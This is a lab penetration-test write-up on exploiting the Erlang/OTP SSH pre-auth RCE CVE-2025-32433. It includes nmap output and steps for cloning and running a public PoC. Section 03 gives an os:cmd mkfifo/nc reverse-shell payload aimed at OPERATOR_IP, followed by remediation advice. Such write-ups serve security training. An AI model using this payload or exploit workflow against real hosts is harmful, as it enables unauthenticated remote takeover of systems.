Case file

Unauthenticated Erlang/OTP SSH pre-auth RCE (CVE-2025-32433)

Foundations network engagement: dual SSH listeners; Erlang/5.2.9 on 22 accepted CVE-2025-32433 pre-auth code execution via public PoC, writing lab.txt and delivering a reverse shell through os:cmd.

Foundations22 minNetwork · SSH · RCE · Erlang
  • Port 22 advertised SSH-2.0-Erlang/5.2.9 alongside OpenSSH on 2222. CVE-2025-32433 (CVSS 10.0) ran unauthenticated Erlang; os:cmd reverse shell recovered the lab artifact.

  • Identified Erlang SSH on 22; ran CVE-2025-32433.py to confirm unauthenticated write.

  • Erlang os:cmd mkfifo payload connected to operator listeners.

01

Engagement summary

Port 22 advertised SSH-2.0-Erlang/5.2.9 alongside OpenSSH on 2222. CVE-2025-32433 (CVSS 10.0) ran unauthenticated Erlang; os:cmd reverse shell recovered the lab artifact.

ERLANG/OTP SSH CVE-2025-32433 targeted a lab host with Erlang SSH on 22 and Ubuntu OpenSSH on 2222. Nmap fingerprint SSH-2.0-Erlang/5.2.9. The ProDefense public exploit sent a pre-authentication payload that confirmed RCE by writing /lab.txt. Swapping the payload to Erlang os:cmd with a mkfifo reverse shell and dual nc listeners returned an interactive shell; flag.txt and container hostname completed the engagement.

Business impact

Pre-auth RCE on Erlang/OTP SSH is full host compromise without credentials. Patch OTP past CVE-2025-32433 immediately; do not expose Erlang SSH to untrusted networks; prefer disabling the SSH daemon if unused.

02

Service map and PoC execution

Identified Erlang SSH on 22; ran CVE-2025-32433.py to confirm unauthenticated write.

OPERATOR · NMAP / PoC

savvy@lab:~$ nmap 10.10.237.184 -sV -sC

22/tcp open ssh Erlang/5.2.9

2222/tcp open ssh OpenSSH 9.6p1 Ubuntu

savvy@lab:~$ git clone https://github.com/ProDefense/CVE-2025-32433 && cd CVE-2025-32433

savvy@lab:~$ python3 CVE-2025-32433.py # RHOST=10.10.237.184 RPORT=22

# exploit sent — /lab.txt written on target

03

os:cmd reverse shell

Erlang os:cmd mkfifo payload connected to operator listeners.

PAYLOAD · ERLANG

payload.erl

os:cmd("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc OPERATOR_IP 4444 >/tmp/f").

OPERATOR · SHELL

savvy@lab:~$ nc -lnvp 4444

savvy@lab:~$ python3 CVE-2025-32433.py # with os:cmd payload

savvy@lab:~$

savvy@lab:~$ cat flag.txt && uname -a

# lab artifact + container hostname

Remediation

Upgrade Erlang/OTP; firewall port 22/Erlang SSH; monitor for anomalous pre-auth SSH traffic to Erlang banners.